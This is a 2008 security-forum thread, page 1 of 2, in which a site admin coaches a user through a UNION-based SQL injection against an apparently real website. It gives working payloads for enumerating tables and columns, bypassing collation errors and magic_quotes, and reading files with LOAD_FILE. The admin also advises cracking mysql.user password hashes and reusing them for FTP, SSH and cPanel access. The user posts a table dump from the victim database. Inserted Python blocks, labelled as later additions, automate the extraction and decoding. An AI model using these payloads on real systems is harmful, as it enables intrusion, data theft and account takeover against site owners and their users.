Waraxe IT Security Portal  
www.waraxe.us Forum Index -> All other security holes
TABLE NAME sql injection exploit
kr0k0 (Advanced user) posted Sat Jan 26, 2008 10:51 am:
Hi, I want to know how I can see all the table names in an SQL injection exploit.

I put: from INFORMATION_SCHEMA.TABLES--

It does not work. Why? And how?
Re: TABLE NAME sql injection exploit
waraxe (Site admin, Tartu, Estonia) posted Sat Jan 26, 2008 1:32 pm:
kr0k0 wrote:
Hi, I want to know how I can see all the table names in an SQL injection exploit.
I put: from INFORMATION_SCHEMA.TABLES--
It does not work. Why? And how?

MySQL version 5.x?

Code:

UNION ALL SELECT 1,TABLE_NAME,3,4,5 FROM INFORMATION_SCHEMA.TABLES


Code:

UNION ALL SELECT 1,CONCAT(TABLE_NAME,0x2e,COLUMN_NAME),3,4,5 FROM INFORMATION_SCHEMA.COLUMNS
nox (Advanced user) posted Sat Jan 26, 2008 4:48 pm:
On another site it does not work. I do not know why.
kr0k0 (Advanced user) posted Sat Jan 26, 2008 4:51 pm:
It does not work. When I put:

Code:
.php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*

you see:

8
4

le 01/01/1970, 5

but when I put:

Code:
.php?id=-1%20UNION%20SELECT%201,2,3,TABLE_NAME,5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*

MySQL error ......

Why?
waraxe (Site admin, Tartu, Estonia) posted Sat Jan 26, 2008 5:22 pm:
Try these tests:

Code:

php?id=-1%20UNION%20SELECT%201,2,3,@@version,5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*


Code:

php?id=-1%20UNION%20SELECT%201,2,3,USER(),5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*


Code:

php?id=-1%20UNION%20SELECT%201,2,3,DATABASE(),5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*


Still SQL errors?

This can be a collation problem; it is very common in real-world attack scenarios. One possible solution:

Code:

php?id=-1%20UNION%20SELECT%201,2,3,HEX(TABLE_NAME),5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*


One more possible error reason: multiple returned rows.

Try this:

Code:

php?id=-1%20UNION%20SELECT%201,2,3,TABLE_NAME,5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES+LIMIT+1,1/*
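The probing and row-by-row extraction waraxe lays out in his two replies above (a UNION with a marker in the echoed column, then @@version / USER() / DATABASE(), HEX() against collation errors, LIMIT n,1 against multiple rows), as an added Python example that is not code from the original thread. The column count (8), the echoed column (4), MySQL 5.x, the numeric id=-1 and the trailing /* are assumptions carried over from kr0k0's URLs; the target at the bottom is a constructed test double, not a real site, and the table names it serves are taken from the hex dump kr0k0 posts later in the thread.

```python
# Added example, not from the original post.  Builds the UNION probes from
# the thread and pulls one row per request with LIMIT offset,1.
# Assumptions: MySQL 5.x, numeric injection point (id=-1 drops the real
# row), a /* comment-out the target accepts, and a known column count /
# echoed column found earlier with the 1,2,...,N probe.
import re
from urllib.parse import quote, unquote

INFO_TABLES = "INFORMATION_SCHEMA.TABLES"


def union_payload(ncols, visible, expr, table=INFO_TABLES, limit=None, hexwrap=False):
    """Raw (not yet URL-encoded) injection string.

    ncols   -- number of columns in the original SELECT
    visible -- 1-based index of the column the page echoes
    expr    -- SQL expression to put in that column (TABLE_NAME, @@version, ...)
    limit   -- row offset for LIMIT offset,1 (one row per request)
    hexwrap -- wrap expr in HEX() so a charset/collation mismatch inside the
               UNION cannot raise an error; the output is then hex-encoded
    """
    if not 1 <= visible <= ncols:
        raise ValueError("visible column must be within 1..ncols")
    if hexwrap:
        expr = f"HEX({expr})"
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[visible - 1] = expr
    sql = f"-1 UNION SELECT {','.join(cols)} FROM {table}"
    if limit is not None:
        sql += f" LIMIT {limit},1"
    return sql + "/*"


def encode_for_url(sql):
    """%20 for spaces as in the thread; SQL punctuation left readable."""
    return quote(sql, safe="-_.,()*@/=")


def diagnostic_probes(ncols, visible):
    """waraxe's order of tests: a constant, @@version, USER(), DATABASE()."""
    return [encode_for_url(union_payload(ncols, visible, e))
            for e in (str(visible), "@@version", "USER()", "DATABASE()")]


def dump_column(send, ncols, visible, expr, table=INFO_TABLES, max_rows=1000):
    """Extract `expr` from every row of `table`, one LIMIT offset at a time.

    send(payload) submits the URL-encoded payload and returns the text the
    page showed in the echoed column, or None once the offset is past the
    last row.  Values come back hex-encoded because hexwrap is used.
    """
    rows = []
    for offset in range(max_rows):
        payload = encode_for_url(
            union_payload(ncols, visible, expr, table, limit=offset, hexwrap=True))
        cell = send(payload)
        if cell is None:          # LIMIT ran past the last row: finished
            break
        rows.append(cell)
    return rows


# Constructed stand-in for the vulnerable page: four names from the dump
# kr0k0 posted later in this thread.  Not a real target.
CONSTRUCTED_TABLES = ["CHARACTER_SETS", "COLLATIONS", "admin", "utilisateur"]


def fake_target(payload):
    """Test double: like the page, echoes HEX(TABLE_NAME) of the row
    selected by LIMIT offset,1 and nothing once the rows run out."""
    sql = unquote(payload)
    m = re.search(r"LIMIT (\d+),1", sql)
    offset = int(m.group(1)) if m else 0
    if offset >= len(CONSTRUCTED_TABLES):
        return None
    return CONSTRUCTED_TABLES[offset].encode().hex().upper()


if __name__ == "__main__":
    for p in diagnostic_probes(8, 4):
        print(p)
    for h in dump_column(fake_target, 8, 4, "TABLE_NAME"):
        print(h, "->", bytes.fromhex(h).decode())
```

Run the four diagnostic probes first: if a constant survives but @@version does not, the failure is about strings in that column (collation, type), not about the UNION itself, and the HEX() wrapper in dump_column is the workaround the thread settles on.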
kr0k0 (Advanced user) posted Sat Jan 26, 2008 7:44 pm:
Just one works:

Code:
php?id=-1%20UNION%20SELECT%201,2,3,HEX(TABLE_NAME),5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*



But it is in hex code:

Code:
8
4348415241435445525F53455453
le 01/01/1970, 5

8
434F4C4C4154494F4E53
le 01/01/1970, 5

8
434F4C4C4154494F4E5F4348415241435445525F5345545F4150504C49434142494C495459
le 01/01/1970, 5

8
434F4C554D4E53
le 01/01/1970, 5

8
434F4C554D4E5F50524956494C45474553
le 01/01/1970, 5

8
4B45595F434F4C554D4E5F5553414745
le 01/01/1970, 5

8
524F5554494E4553
le 01/01/1970, 5

8
534348454D415441
le 01/01/1970, 5

8
534348454D415F50524956494C45474553
le 01/01/1970, 5

8
53544154495354494353
le 01/01/1970, 5

8
5441424C4553
le 01/01/1970, 5

8
5441424C455F434F4E53545241494E5453
le 01/01/1970, 5

8
5441424C455F50524956494C45474553
le 01/01/1970, 5

8
5452494747455253
le 01/01/1970, 5

8
5649455753
le 01/01/1970, 5

8
555345525F50524956494C45474553
le 01/01/1970, 5

8
62616332303036
le 01/01/1970, 5

8
61646D696E
le 01/01/1970, 5

8
626F75727365
le 01/01/1970, 5

8
636C617373656D656E745F73706F72745F323030365F32303037
le 01/01/1970, 5

8
64617461747261636B6572
le 01/01/1970, 5

8
64617461747261636B65725F74657374
le 01/01/1970, 5

8
646576697365
le 01/01/1970, 5

8
6571756970655F323030365F32303037
le 01/01/1970, 5

8
696E666F5F626F75727365
le 01/01/1970, 5

8
696E666F5F63696E656D61
le 01/01/1970, 5

8
696E666F5F6D6574656F
le 01/01/1970, 5

8
696E666F5F6D7573697175655F617274
le 01/01/1970, 5

8
696E666F5F73696D706C65
le 01/01/1970, 5

8
69706175746F72697365
le 01/01/1970, 5

8
6A6F75726E616C
le 01/01/1970, 5

8
6A6F75726E616C5F6261636B7570
le 01/01/1970, 5

8
6A6F75726E6E65655F323030365F32303037
le 01/01/1970, 5

8
72656D6172717565
le 01/01/1970, 5

8
726573756C7461745F73706F72745F323030365F32303037
le 01/01/1970, 5

8
746175785F6368616E6765
le 01/01/1970, 5

8
7574696C69736174657572
le 01/01/1970, 5

8
636C617373656D656E745F73706F7274
le 01/01/1970, 5

8
657175697065
le 01/01/1970, 5

8
6A6F75726E6E6565
le 01/01/1970, 5

8
726573756C7461745F73706F7274
le 01/01/1970, 5

8
61637475616C697465
le 01/01/1970, 5

8
616E6E6565
le 01/01/1970, 5

8
626F757469717565
le 01/01/1970, 5

8
63617465676F7269655F61637475616C697465
le 01/01/1970, 5

8
636F6D6D756E697175655F707265737365
le 01/01/1970, 5

8
636F6E73756C746174696F6E
le 01/01/1970, 5

8
6465636C61726174696F6E5F706467
le 01/01/1970, 5

8
64657461696C5F61637475616C697465
le 01/01/1970, 5

8
646972696765616E74
le 01/01/1970, 5

8
646973636F75725F706467
le 01/01/1970, 5

8
646973747269627574657572
le 01/01/1970, 5

8
646F6C65616E6365
le 01/01/1970, 5

8
646F73736965725F707265737365
le 01/01/1970, 5

8
6573706163655F7075626C6963697461697265
le 01/01/1970, 5

8
67616C65726965
le 01/01/1970, 5

8
676C6F737361697265
le 01/01/1970, 5

8
6F666672655F6D6F62696C6973
le 01/01/1970, 5

8
6F666672655F6D6F62696C69735F73657276696365
le 01/01/1970, 5

8
6F70657261746575725F726F616D696E67
le 01/01/1970, 5

8
70617973
le 01/01/1970, 5

8
70686F746F5F67616C65726965
le 01/01/1970, 5

8
7265636861726765
le 01/01/1970, 5

8
726567696F6E
le 01/01/1970, 5

8
73657276696365
le 01/01/1970, 5

8
73657373696F6E73
le 01/01/1970, 5

8
7461726966735F696E7465726E6174696F6E616C
le 01/01/1970, 5

8
7461726966735F6E6174696F6E616C
le 01/01/1970, 5

8
7461726966735F726F616D696E675F656D697373696F6E
le 01/01/1970, 5

8
7461726966735F726F616D696E675F726563657074696F6E
le 01/01/1970, 5

8
7461726966735F726F616D696E675F736D735F656D697373696F6E
le 01/01/1970, 5

8
747970655F67616C65726965
le 01/01/1970, 5

8
7574696C6973617465757273
le 01/01/1970, 5

8
7A6F6E65
le 01/01/1970, 5

8
626C61677565
le 01/01/1970, 5

8
70726F76657262656A6F7572
le 01/01/1970, 5

8
636F6C756D6E735F70726976
le 01/01/1970, 5

8
6462
le 01/01/1970, 5

8
66756E63
le 01/01/1970, 5

8
68656C705F63617465676F7279
le 01/01/1970, 5

8
68656C705F6B6579776F7264
le 01/01/1970, 5

8
68656C705F72656C6174696F6E
le 01/01/1970, 5

8
68656C705F746F706963
le 01/01/1970, 5

8
686F7374
le 01/01/1970, 5

8
70726F63
le 01/01/1970, 5

8
70726F63735F70726976
le 01/01/1970, 5

8
7461626C65735F70726976
le 01/01/1970, 5

8
74696D655F7A6F6E65
le 01/01/1970, 5

8
74696D655F7A6F6E655F6C6561705F7365636F6E64
le 01/01/1970, 5

8
74696D655F7A6F6E655F6E616D65
le 01/01/1970, 5

8
74696D655F7A6F6E655F7472616E736974696F6E
le 01/01/1970, 5

8
74696D655F7A6F6E655F7472616E736974696F6E5F74797065
le 01/01/1970, 5

8
75736572
le 01/01/1970, 5

8
757365725F696E666F
le 01/01/1970, 5

8
61746D5F615F63617465676F7279
le 01/01/1970, 5

8
61746D5F615F636F6E666967
le 01/01/1970, 5

8
61746D5F615F66696C65
le 01/01/1970, 5

8
61746D5F615F6B6579776F7264
le 01/01/1970, 5

8
61746D5F615F6E6577736C6574746572
le 01/01/1970, 5

8
61746D5F615F70616765
le 01/01/1970, 5

8
61746D5F615F706172746E65725F6E616D65
le 01/01/1970, 5

8
61746D5F615F706172746E65725F75726C
le 01/01/1970, 5

8
61746D5F615F70726F7669646572
le 01/01/1970, 5

8
61746D5F615F7265736F6C7574696F6E
le 01/01/1970, 5

8
61746D5F615F7365617263685F656E67696E65
le 01/01/1970, 5

8
61746D5F615F73697465
le 01/01/1970, 5

8
61746D5F615F766172735F6E616D65
le 01/01/1970, 5

8
61746D5F615F766172735F76616C7565
le 01/01/1970, 5

8
61746D5F6172636869766573
le 01/01/1970, 5

8
61746D5F63617465676F7279
le 01/01/1970, 5

8
61746D5F67726F757073
le 01/01/1970, 5

8
61746D5F69705F69676E6F7265
le 01/01/1970, 5

8
61746D5F6C696E6B5F7670
le 01/01/1970, 5

8
61746D5F6C696E6B5F767076
le 01/01/1970, 5

8
61746D5F6E6577736C6574746572
le 01/01/1970, 5

8
61746D5F70616765
le 01/01/1970, 5

8
61746D5F706167655F6D643575726C
le 01/01/1970, 5

8
61746D5F706167655F75726C
le 01/01/1970, 5

8
61746D5F71756572795F6C6F67
le 01/01/1970, 5

8
61746D5F73697465
le 01/01/1970, 5

8
61746D5F736974655F706172746E6572
le 01/01/1970, 5

8
61746D5F736974655F706172746E65725F75726C
le 01/01/1970, 5

8
61746D5F736974655F75726C
le 01/01/1970, 5

8
61746D5F7573657273
le 01/01/1970, 5

8
61746D5F75736572735F6C696E6B5F67726F757073
le 01/01/1970, 5

8
61746D5F76617273
le 01/01/1970, 5

8
61746D5F76657273696F6E
le 01/01/1970, 5

8
61746D5F7669736974
le 01/01/1970, 5

8
636F6E737472756374657572
le 01/01/1970, 5

8
706F727461626C6573
le 01/01/1970, 5

8
616D6261737361646573
le 01/01/1970, 5

8
62656C6C65
le 01/01/1970, 5

8
636861696E655F7476
le 01/01/1970, 5

8
636F6D6D756E69717565735F707265737365
le 01/01/1970, 5

8
646F7561615F656C5F7961776D
le 01/01/1970, 5

8
686F72616972655F707269657265
le 01/01/1970, 5

8
686F726F73636F7065
le 01/01/1970, 5

8
6E6F7576656175746573
le 01/01/1970, 5

8
70726F6772616D6D657476
le 01/01/1970, 5

8
70726F76657262655F7468656D65
le 01/01/1970, 5

8
72656365747465
le 01/01/1970, 5

8
7468656D655F6369746174696F6E
le 01/01/1970, 5
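Decoding the dump above, as an added Python example that is not from the original post: the parser below takes the echoed records in the form kr0k0 posted (an "8", the hex value, a date line), hex-decodes the names and sorts them into INFORMATION_SCHEMA views, MySQL system tables and application tables. The excerpt embedded in the code is copied from the dump; the bucketing by bare name is a heuristic, because TABLE_NAME alone does not carry the schema (select CONCAT(TABLE_SCHEMA,0x2e,TABLE_NAME) to get it without guessing), and an application table could itself be called "user".

```python
# Added example, not from the original post.  Parses the echoed output
# format seen in the thread and hex-decodes the table names.
import re

# Excerpt of kr0k0's dump above; the real output has ~150 such records.
POSTED_OUTPUT = """8
4348415241435445525F53455453
le 01/01/1970, 5

8
434F4C4C4154494F4E53
le 01/01/1970, 5

8
61646D696E
le 01/01/1970, 5

8
7574696C69736174657572
le 01/01/1970, 5

8
75736572
le 01/01/1970, 5

8
7461626C65735F70726976
le 01/01/1970, 5
"""

HEX_LINE = re.compile(r"(?:[0-9A-Fa-f]{2}){2,}")  # whole line, at least 2 bytes

# The 16 INFORMATION_SCHEMA views of MySQL 5.0, exactly as they appear at
# the top of the dump, and the tables of the mysql system database.
INFORMATION_SCHEMA_VIEWS = {
    "CHARACTER_SETS", "COLLATIONS", "COLLATION_CHARACTER_SET_APPLICABILITY",
    "COLUMNS", "COLUMN_PRIVILEGES", "KEY_COLUMN_USAGE", "ROUTINES", "SCHEMATA",
    "SCHEMA_PRIVILEGES", "STATISTICS", "TABLES", "TABLE_CONSTRAINTS",
    "TABLE_PRIVILEGES", "TRIGGERS", "VIEWS", "USER_PRIVILEGES",
}
GRANT_TABLES = {"user", "db", "host", "tables_priv", "columns_priv", "procs_priv"}
MYSQL_SYSTEM_TABLES = GRANT_TABLES | {
    "func", "proc", "help_category", "help_keyword", "help_relation",
    "help_topic", "time_zone", "time_zone_leap_second", "time_zone_name",
    "time_zone_transition", "time_zone_transition_type",
}


def decode_hex_rows(text):
    """Return the decoded value of every line that is pure hex.

    The "8" and "le 01/01/1970, 5" lines are the other echoed columns and
    are skipped; a decoded value must be printable to count as a name.
    """
    names = []
    for line in text.splitlines():
        line = line.strip()
        if not HEX_LINE.fullmatch(line):
            continue
        value = bytes.fromhex(line).decode("utf-8", errors="replace")
        if value.isprintable():
            names.append(value)
    return names


def classify(names):
    """Heuristic bucketing by name (TABLE_NAME carries no schema)."""
    buckets = {"information_schema": [], "mysql": [], "application": []}
    for name in names:
        if name in INFORMATION_SCHEMA_VIEWS:
            buckets["information_schema"].append(name)
        elif name in MYSQL_SYSTEM_TABLES:
            buckets["mysql"].append(name)
        else:
            buckets["application"].append(name)
    return buckets


def mysql_grant_tables_visible(names):
    """True when the injected query can see the grant tables, i.e. the DB
    user has read access to the mysql database (the point waraxe makes
    later in the thread about mysql.user and password hashes)."""
    return bool(GRANT_TABLES & set(names))


if __name__ == "__main__":
    found = decode_hex_rows(POSTED_OUTPUT)
    for bucket, items in classify(found).items():
        print(bucket, items)
    print("grant tables visible:", mysql_grant_tables_visible(found))
```

In the full dump the names user, db, host, func, proc, tables_priv, columns_priv, procs_priv, help_* and time_zone* all appear, which is the sign that this database account can read the mysql schema and that the mysql.user query kr0k0 tries further down is worth pursuing.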
waraxe (Site admin, Tartu, Estonia) posted Sat Jan 26, 2008 7:48 pm:
Try this:

Code:

php?id=-1%20UNION%20SELECT%201,2,3,UNHEX(HEX(TABLE_NAME)),5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*
kr0k0 (Advanced user) posted Sat Jan 26, 2008 7:58 pm:
Thanks, working 1000%!

You are the top, waraxe, you are a cracker.
kr0k0 (Advanced user) posted Sat Jan 26, 2008 8:00 pm:
Bro, how can I see the table admin?

mysql.admin/*

INFORMATION_SCHEMA.admin/*

do not work?

And thanks.
waraxe (Site admin, Tartu, Estonia) posted Sat Jan 26, 2008 8:35 pm:
kr0k0 wrote:
Bro, how can I see the table admin?
mysql.admin/*
INFORMATION_SCHEMA.admin/*
do not work?
And thanks.

There is a mysql.user table, but it seems that you have no access privileges to it.
INFORMATION_SCHEMA enumerates all tables in all databases available to the currently logged-in user. If there is no "user" table (from mysql.user), then there is no access to the mysql database. Most real-world SQL injections are not capable of accessing mysql.user, because server/database admins will not easily give out such privileges. Still, there are lots of .EDU, .ORG and other low-security servers where SQL injection will give you MySQL root privileges. Lazy admins ...
So in this case the FILE privilege is no problem: you can read and write local files and try to get PHP or shell access level. And of course mysql.user will be available in this case. You can fetch MySQL usernames and password hashes, crack the hashes with Cain and then try them as ftp/ssh/Cpanel/DirectAdmin/etc. credentials. People tend to be lazy and use the same passwords for many accounts ...
kr0k0 (Advanced user) posted Sun Jan 27, 2008 6:14 am:
Thanks for the info, waraxe.

How do I put CONCAT into this, between this:
Code:
.php?id=-1%20UNION%20SELECT%201,2,3,UNHEX(HEX(table_name)),5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*

and this:

Code:
.php?id=-1%20UNION%20SELECT%201,2,3,UNHEX(HEX(column_name)),5,6,7,8%20FROM%20INFORMATION_SCHEMA.columns/*

And thanks, Waraxe.
waraxe (Site admin, Tartu, Estonia) posted Sun Jan 27, 2008 1:08 pm:
Something like this maybe:

Code:

.php?id=-1%20UNION%20SELECT%201,2,3,UNHEX(HEX(CONCAT(TABLE_NAME,0x2e,COLUMN_NAME))),5,6,7,8%20FROM%20INFORMATION_SCHEMA.COLUMNS/*
kr0k0 (Advanced user) posted Mon Jan 28, 2008 11:12 am:
Hmhmh.

Bro, when I put:

Code:
php?id=-1%20UNION%20SELECT%201,2,3,LOAD_FILE('/'),5,6,7,8/**/from/**/mysql.user/*

8

le 01/01/1970, 5

When I put:

Code:
php?id=-1%20UNION%20SELECT%201,2,3,LOAD_FILE('/etc/passwd'),5,6,7,8/**/from/**/mysql.user/*

MySQL error

__________________

I found all the tables of the DB:

Code:
admin
user
tables
etc...

When I go to 'user':

Code:
php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8/**/from/**/mysql.user/*

I find:

Code:
8
4
le 01/01/1970, 5

but when I go to admin, look:

Code:
php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8/**/from/**/mysql.admin/*

Code:
php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8+INFORMATION_SCHEMA.admin/*

Code:
php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8+FROM+admin/*

MySQL DB error ...

Help?

To read /etc/passwd, and to get to admin [by HEX].
Thanks Waraxe
waraxe (Site admin, Tartu, Estonia) posted Mon Jan 28, 2008 10:15 pm:
1. Because on most servers "magic_quotes=on", you must use hex-encoded strings as the argument for LOAD_FILE().

Example: LOAD_FILE(0x633A5C626F6F742E696E69) for boot.ini on a Windows server.

More useful info here:

http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

2. There is no such thing as "mysql.admin" nor "INFORMATION_SCHEMA.admin" ...
I suggest installing apache/php/mysql/phpmyadmin on your home PC and then using phpmyadmin to take a good look at the mysql and information_schema databases! All database users are in mysql.user ...

And of course, you must understand that there is a difference between a database user and a web application user (for example a phpBB forum user or admin).
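Why the quoted LOAD_FILE('/etc/passwd') broke while the 0x... form does not, as an added Python example that is not from the original post. addslashes() below re-implements what PHP's magic_quotes_gpc applied to every request value (a backslash before ' " \ and NUL), so you can see what MySQL actually received in each case; the paths are the ones from the thread and hex_literal() produces the same 0x633A5C626F6F742E696E69 waraxe gives for c:\boot.ini.

```python
# Added example, not from the original post.  Shows the effect of PHP
# magic_quotes_gpc on an injected LOAD_FILE() argument and why a MySQL
# 0x... literal survives it.


def addslashes(value):
    """PHP addslashes(), which is what magic_quotes_gpc applied to GET/POST:
    a backslash before single quote, double quote, backslash and NUL."""
    out = []
    for ch in value:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def hex_literal(text):
    """MySQL 0x... string literal for `text`.  It contains no quote or
    backslash, so magic_quotes has nothing to escape in it."""
    return "0x" + text.encode("utf-8").hex().upper()


def from_hex_literal(literal):
    """Inverse of hex_literal(), to check a literal before sending it."""
    if not literal.startswith("0x") or len(literal) % 2:
        raise ValueError("not a 0x literal")
    return bytes.fromhex(literal[2:]).decode("utf-8")


def load_file_expr(path, use_hex):
    """The LOAD_FILE() call as the attacker writes it into the URL."""
    if use_hex:
        return f"LOAD_FILE({hex_literal(path)})"
    return f"LOAD_FILE('{path}')"


def as_seen_by_mysql(expr):
    """The same expression after the PHP layer ran magic_quotes over it."""
    return addslashes(expr)


def survives_magic_quotes(expr):
    """True when the escaping leaves the injected SQL unchanged; a quoted
    string comes out as \\'...\\', which is a syntax error inside the query."""
    return as_seen_by_mysql(expr) == expr


if __name__ == "__main__":
    for path in ("/etc/passwd", "c:\\boot.ini"):
        for use_hex in (False, True):
            e = load_file_expr(path, use_hex)
            print(e, "=>", as_seen_by_mysql(e),
                  "ok" if survives_magic_quotes(e) else "broken")
```

Two things the hex form does not fix: LOAD_FILE() returns NULL rather than an error when the file does not exist, is a directory, is not readable by the mysqld OS user, exceeds max_allowed_packet or the database account lacks the FILE privilege, so an empty cell only tells you the query parsed. Check from_hex_literal() on what you are about to send, since a single dropped hex digit silently changes the path.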
kr0k0 (Advanced user) posted Tue Jan 29, 2008 6:08 am:
MySQL error ...
Page 1 of 2 (the thread continues on page 2). All times are GMT.

Powered by phpBB (c) 2001-2008 phpBB Group. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe".